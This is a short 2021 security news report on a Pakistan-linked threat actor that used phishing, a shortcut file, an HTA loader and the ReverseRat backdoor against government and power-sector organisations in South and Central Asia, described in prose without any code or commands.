Security News > 2021 > June > Pakistan-linked hackers targeted Indian power company with ReverseRat
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.
Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization.
The intrusions are notable for a number of reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures adopted by the adversary rely on repurposed open-source code and the use of compromised domains in the same country as the targeted entity to host their malicious files.
The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file and a decoy PDF file from a compromised domain.
The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA file from the same compromised website.
Irrespective of the PDF document displayed to the victim, the HTA file - itself a JavaScript code based on a GitHub project called CactusTorch - is leveraged to inject a 32-bit shellcode into a running process to ultimately install a.NET backdoor called ReverseRat that runs the typical spyware gamut, with capabilities to capture screenshots, terminate processes, execute arbitrary executables, perform file operations, and upload data to a remote server.